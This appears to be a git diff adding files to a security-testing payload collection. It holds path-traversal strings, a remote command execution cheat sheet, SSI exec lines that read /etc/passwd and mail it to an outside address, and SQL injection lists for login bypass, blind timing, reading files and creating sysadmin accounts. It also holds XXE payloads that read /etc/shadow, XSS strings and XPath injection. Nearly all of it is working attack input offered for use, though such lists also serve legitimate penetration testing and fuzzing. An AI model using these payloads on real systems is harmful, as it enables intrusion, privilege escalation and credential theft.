/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
|
||||
/./../{FILE}
|
||||
/./.././../{FILE}
|
||||
/./.././.././../{FILE}
|
||||
/./.././.././.././../{FILE}
|
||||
/./.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././.././../{FILE}
|
||||
/.\..\{FILE}
|
||||
/.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.//..//{FILE}
|
||||
/.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/../{FILE}
|
||||
/../..//{FILE}
|
||||
/../..//../{FILE}
|
||||
/../..//../..//{FILE}
|
||||
/../..//../..//../{FILE}
|
||||
/../..//../..//../..//{FILE}
|
||||
/../..//../..//../..//../{FILE}
|
||||
/../..//../..//../..//../..//{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\\{FILE}
|
||||
/..\..\\..\{FILE}
|
||||
/..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\{FILE}
|
||||
/..///{FILE}
|
||||
/../..///{FILE}
|
||||
/../..//..///{FILE}
|
||||
/../..//../..///{FILE}
|
||||
/../..//../..//..///{FILE}
|
||||
/../..//../..//../..///{FILE}
|
||||
/../..//../..//../..//..///{FILE}
|
||||
/../..//../..//../..//../..///{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\..\\\{FILE}
|
||||
/..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
3
attack-payloads/rfi/readme.txt
Normal file
3
attack-payloads/rfi/readme.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
Other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
178
attack-payloads/rfi/rfi-cheatsheet.html
Normal file
178
attack-payloads/rfi/rfi-cheatsheet.html
Normal file
|
@ -0,0 +1,178 @@
|
|||
<html>
|
||||
<head>
|
||||
<title>Web Hacking. cd hack. cs hack. hacked godzilla. </title>
|
||||
<META http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
||||
<META NAME="robots" CONTENT="index all, follow">
|
||||
</head>
|
||||
|
||||
<div class=Section1>
|
||||
|
||||
<p class=doctext><span lang=EN-GB>This table provides a handy list of
|
||||
techniques that can be used for remote command execution, by language.</span></p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><a name=app03table01></a><span
|
||||
lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table: Remote
|
||||
Command Execution Cheat Sheet</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Web Application Environment</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Source Code</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Additional Information</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Java Servlet </span></p>
|
||||
</td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><span lang=EN-GB>class Example</span></pre><pre><span
|
||||
lang=EN-GB> extends HTTPServlet</span></pre><pre><span lang=EN-GB>{</span></pre><pre><span
|
||||
lang=EN-GB> .</span></pre><pre><span lang=EN-GB> .</span></pre><pre><span
|
||||
lang=EN-GB> .</span></pre><pre><span lang=EN-GB> void function()</span></pre><pre><span
|
||||
lang=EN-GB> {</span></pre><pre><span lang=EN-GB>Runtime r = Runtime.getRuntime();</span></pre><pre><span
|
||||
lang=EN-GB>Process p = r.exec("<span class=docemphasis1><command></span>",</span></pre><pre><span
|
||||
class=docemphasis1><arguments></span>);</pre><pre>}</pre><pre> .</pre><pre> .</pre><pre> .</pre><pre>}</pre></td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
|
||||
target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Java Server Pages (JSP) </span></p>
|
||||
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><%</pre><pre> Runtime r =</pre><pre>Runtime.getRuntime();</pre><pre> Process p =</pre><pre>r.exec("<span
|
||||
class=docemphasis1><command></span>",</pre><pre><span
|
||||
class=docemphasis1><arguments></span>);</pre><pre>%></pre></td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
|
||||
target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
|
||||
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Active Server Pages (ASP) </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=doctext><span lang=EN-GB>If Windows Scripting Host</span></p>
|
||||
<p class=doctext><span lang=EN-GB>is installed on the target</span></p>
|
||||
<p class=doctext><span lang=EN-GB>system:</span></p>
|
||||
<pre><span lang=EN-GB><%</span></pre><pre><span lang=EN-GB> Set wsh =</span></pre><pre><span
|
||||
lang=EN-GB>Server.CreateObject("Wscript.shell")</span></pre><pre><span
|
||||
lang=EN-GB> </span>wsh.run("<span class=docemphasis1><command></span>");</pre><pre>%></pre></td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="zhttp://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp"
|
||||
target="_blank"><span style='color:#003399'>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp</span></a>
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PERL </span></p>
|
||||
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>In PERL, commands are executed by wrapping
|
||||
them with the backtick symbol (`)</span></p>
|
||||
<p class=doctext><span lang=EN-GB>$result = `<span class=docemphasis1><command></span>`;</span></p>
|
||||
<p class=doctext><span lang=EN-GB>or</span></p>
|
||||
<p class=doctext><span lang=EN-GB>system("<span class=docemphasis1><command></span>");</span></p>
|
||||
|
||||
<p class=doctext>or</p>
|
||||
<p class=doctext>open(IN, "<span class=docemphasis1><command></span>
|
||||
|");</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.perldoc.com/perl5.6/pod/perlfunc.html"
|
||||
target="_blank"><span style='color:#003399'>http://www.perldoc.com/perl5.6/pod/perlfunc.html</span></a>
|
||||
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PHP </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=doctext><span lang=EN-GB><? system("<span
|
||||
class=docemphasis1><command></span>") ?></span></p>
|
||||
<p class=doctext><span lang=EN-GB>or</span></p>
|
||||
<p class=doctext><span lang=EN-GB><? shell_exec("<span
|
||||
class=docemphasis1><command></span>") ?></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.php.net/manual/en/function.shell-exec.php"
|
||||
target="_blank"><span lang=EN-GB style='color:#003399'>http://www.php.net/manual/en/function.shell-exec.php</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>MS SQL </span></p>
|
||||
</td>
|
||||
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>EXEC master..xp_cmdshell" <command>" </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
<br>
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
2246
attack-payloads/rfi/rfi.txt
Normal file
2246
attack-payloads/rfi/rfi.txt
Normal file
File diff suppressed because it is too large
Load diff
|
@ -0,0 +1,5 @@
|
|||
# includes work by Foobar@email.de
|
||||
<!--#exec cmd="/bin/ls /" --><br/>
|
||||
<!--#exec cmd="cat /etc/passwd" --><br/>
|
||||
<!--#exec cmd="find / -name *.* -print" --><br/>
|
||||
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
|
|
@ -0,0 +1,11 @@
|
|||
# contains statements from jbrofuzz (13 April 2010)
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
create user name identified by 'pass123'
|
||||
create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||||
' ; drop table temp --
|
||||
exec sp_addlogin 'name' , 'password'
|
||||
exec sp_addsrvrolemember 'name' , 'sysadmin'
|
||||
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
|
||||
grant connect to name; grant resource to name;
|
||||
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||||
|
|
@ -0,0 +1,57 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||
||6
|
||||
'||'6
|
||||
(||6)
|
||||
' or 1=1--
|
||||
or 1=1
|
||||
' or '1'='1
|
||||
; or '1'='1'
|
||||
" or isNULL(1/0) /*
|
||||
' or '7659'='7659
|
||||
" or isNULL(1/0) /*
|
||||
' --
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or 1=1 /*
|
||||
or 1=1--
|
||||
' or 'a'='a
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
admin' or '
|
||||
' select * from information_schema.tables--
|
||||
) union select * from information_schema.tables;
|
||||
' having 1=1--
|
||||
' having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
||||
' or 1 in (select @@version)--
|
||||
' union all select @@version--
|
||||
' or 'unusual' = 'unusual'
|
||||
' or 'something' = 'some'+'thing'
|
||||
' or 'text' = n'text'
|
||||
' or 'something' like 'some%'
|
||||
' or 2 > 1
|
||||
' or 'text' > 't'
|
||||
' or 'whatever' in ('whatever')
|
||||
' or 2 between 1 and 3
|
||||
' or username like char(37);
|
||||
' union select * from users where login = char(114,111,111,116);
|
||||
' union select
|
||||
password:*/=1--
|
||||
uni/**/on sel/**/ect
|
||||
'; execute immediate 'sel' || 'ect us' || 'er'
|
||||
'; exec ('sel' + 'ect us' + 'er')
|
||||
'/**/or/**/1/**/=/**/1
|
||||
' or 1/*
|
||||
or isNULL(1/0) /*
|
||||
' or '7659'='7659
|
||||
" or isNULL(1/0) /*
|
||||
' -- &password=
|
||||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||||
@var select @var as var into temp end --
|
||||
' and 1 in (select var from temp)--
|
||||
' union select 1,load_file('/etc/passwd'),1,1,1;
|
||||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
||||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
||||
|
144
attack-payloads/sql-injection/detect-generic/sql-injection.txt
Normal file
144
attack-payloads/sql-injection/detect-generic/sql-injection.txt
Normal file
|
@ -0,0 +1,144 @@
|
|||
# to attempt with ids/waf evasion try like
|
||||
# /index.aspx?page=select 1&page=2,3 from table where id=1
|
||||
'sqlvuln
|
||||
'+sqlvuln
|
||||
sqlvuln;
|
||||
(sqlvuln)
|
||||
a' or 1=1--
|
||||
"a"" or 1=1--"
|
||||
or a = a
|
||||
a' or 'a' = 'a
|
||||
1 or 1=1
|
||||
a' waitfor delay '0:0:10'--
|
||||
1 waitfor delay '0:0:10'--
|
||||
declare @q nvarchar (4000) select @q =
|
||||
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
||||
0
|
||||
031003000270000
|
||||
declare @s varchar(22) select @s =
|
||||
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
||||
exec(@s)
|
||||
a'
|
||||
?
|
||||
' or 1=1
|
||||
‘ or 1=1 --
|
||||
x' AND userid IS NULL; --
|
||||
x' AND email IS NULL; --
|
||||
anything' OR 'x'='x
|
||||
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
||||
x' AND members.email IS NULL; --
|
||||
x' OR full_name LIKE '%Bob%
|
||||
23 OR 1=1
|
||||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||||
'
|
||||
'%20or%20''='
|
||||
'%20or%20'x'='x
|
||||
%20or%20x=x
|
||||
')%20or%20('x'='x
|
||||
0 or 1=1
|
||||
' or 0=0 --
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
' or 0=0 #
|
||||
or 0=0 #"
|
||||
or 0=0 #
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or '1'='1'--
|
||||
' or 1 --'
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 1=1 or ''='
|
||||
or 1=1 or ""=
|
||||
' or a=a--
|
||||
or a=a
|
||||
') or ('a'='a
|
||||
) or (a=a
|
||||
hi or a=a
|
||||
hi or 1=1 --"
|
||||
hi' or 1=1 --
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
"hi"") or (""a""=""a"
|
||||
'hi' or 'x'='x';
|
||||
@variable
|
||||
,@variable
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
select
|
||||
insert
|
||||
as
|
||||
or
|
||||
procedure
|
||||
limit
|
||||
order by
|
||||
asc
|
||||
desc
|
||||
delete
|
||||
update
|
||||
distinct
|
||||
having
|
||||
truncate
|
||||
replace
|
||||
like
|
||||
handler
|
||||
bfilename
|
||||
' or username like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or uid like '%
|
||||
' or user like '%
|
||||
exec xp
|
||||
exec sp
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
--sp_password
|
||||
\x27UNION SELECT
|
||||
' UNION SELECT
|
||||
' UNION ALL SELECT
|
||||
' or (EXISTS)
|
||||
' (select top 1
|
||||
'||UTL_HTTP.REQUEST
|
||||
1;SELECT%20*
|
||||
to_timestamp_tz
|
||||
tz_offset
|
||||
<>"'%;)(&+
|
||||
'%20or%201=1
|
||||
%27%20or%201=1
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
char%4039%41%2b%40SELECT
|
||||
'%20OR
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
|
|
||||
%7C
|
||||
*|
|
||||
%2A%7C
|
||||
*(|(mail=*))
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
*(|(objectclass=*))
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
(
|
||||
%28
|
||||
)
|
||||
%29
|
||||
&
|
||||
%26
|
||||
!
|
||||
%21
|
||||
' or 1=1 or ''='
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
a' or 3=3--
|
||||
"a"" or 3=3--"
|
||||
' or 3=3
|
||||
‘ or 3=3 --
|
|
@ -0,0 +1,9 @@
|
|||
# contains statements from jbrofuzz (13 April 2010)
|
||||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
||||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|
|
@ -0,0 +1,7 @@
|
|||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
|
@ -0,0 +1,11 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
1
|
||||
1 and user_name() = 'dbo'
|
||||
\'; desc users; --
|
||||
1\'1
|
||||
1' and non_existant_table = '1
|
||||
' or username is not NULL or username = '
|
||||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||||
1 uni/**/on select all from where
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
1
|
||||
1'1
|
||||
1 exec sp_ (or exec xp_)
|
||||
1 and 1=1
|
||||
1' and 1=(select count(*) from tablenames); --
|
||||
|
|
@ -0,0 +1,4 @@
|
|||
# contains statements from jbrofuzz
|
||||
'||utl_http.request('httP://192.168.1.1/')||'
|
||||
' || myappadmin.adduser('admin', 'newpass') || '
|
||||
|
BIN
attack-payloads/sql-injection/docs.oracle_cheat.pdf
Normal file
BIN
attack-payloads/sql-injection/docs.oracle_cheat.pdf
Normal file
Binary file not shown.
910
attack-payloads/sql-injection/docs.sql_injection_cheatsheet.html
Normal file
910
attack-payloads/sql-injection/docs.sql_injection_cheatsheet.html
Normal file
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,9 @@
|
|||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
' or 1=1--
|
||||
' or 1=1#
|
||||
' or 1=1/*
|
||||
') or '1'='1--
|
||||
') or ('1'='1--
|
||||
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
|
15
attack-payloads/xml/xml-attacks.txt
Normal file
15
attack-payloads/xml/xml-attacks.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
10
attack-payloads/xpath/xpath-injection.txt
Normal file
10
attack-payloads/xpath/xpath-injection.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
' or '1'='1
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
@*
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
File diff suppressed because it is too large
Load diff
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/ff2.png
Normal file
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/ff2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 295 B |
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/ie7.png
Normal file
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/ie7.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 289 B |
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/safari3.png
Normal file
BIN
attack-payloads/xss/docs.wasc-scriptmapping/images/safari3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 287 B |
25
attack-payloads/xss/docs.wasc-scriptmapping/license.txt
Normal file
25
attack-payloads/xss/docs.wasc-scriptmapping/license.txt
Normal file
|
@ -0,0 +1,25 @@
|
|||
Guest Articles Content License
|
||||
Terms and Conditions for Copying, Distributing, and Modifying
|
||||
|
||||
Items other than copying, distributing, and modifying the Content with
|
||||
which this license was distributed (such as using, etc.) are outside the
|
||||
scope of this license.
|
||||
|
||||
1. You may copy and distribute exact replicas of the OpenContent (OC) as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the OC a copy of this License along with the OC. You may at your option charge a fee for the media and/or handling involved in creating a unique copy of the OC for use offline, you may at your option offer instructional support for the OC in exchange for a fee, or you may at your option offer warranty in exchange for a fee. You may not charge a fee for the OC itself. You may not charge a fee for the sole service of providing access to and/or use of the OC via a network (e.g. the Internet), whether it be via the world wide web, FTP, or any other method.
|
||||
|
||||
2. You may modify your copy or copies of the OpenContent or any portion of it, thus forming works based on the Content, and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:
|
||||
|
||||
a) You must cause the modified content to carry prominent notices stating that you changed it, the exact nature and content of the changes, and the date of any change.
|
||||
|
||||
b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the OC or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License, unless otherwise permitted under applicable Fair Use law.
|
||||
|
||||
